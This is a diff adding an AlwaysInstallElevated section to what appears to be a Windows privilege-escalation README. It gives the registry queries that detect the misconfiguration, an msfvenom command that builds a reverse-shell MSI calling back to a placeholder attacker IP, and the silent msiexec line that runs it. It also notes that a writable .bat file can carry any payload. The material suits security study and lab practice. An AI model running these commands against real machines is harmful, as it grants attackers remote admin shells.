politelychaotic/Windows-Privilege-Escalation/README.md

 As shown in the result, the **BUILTIN\Users** group has full access (F) over the task's binary.
 Meaning we can modify the `.bat` file and insert any payload we like.

+### AlwaysInstallElevated
+Windows installer files `.msi` are used to install apps on the system.
+They usually run with the privilege level of the user that starts it.
+These can be configured to run with higher privileges from any user account (even unprivileged).
+This could potentially allow us to generate a malicious **MSI** file that would run with admin privileges.

+This method requires two registry values to be set.
+You can query these from the command line:

+    C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
+    C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

+To exploit this vuln, both should be set.
+Otherwise, exploitation is not possible.
+If these are set, you can generate a malicious `.msi` using `msfvenom` like so:

+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

+In this case we would use the Metasploit handler, and you can run the installer like:

+    C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi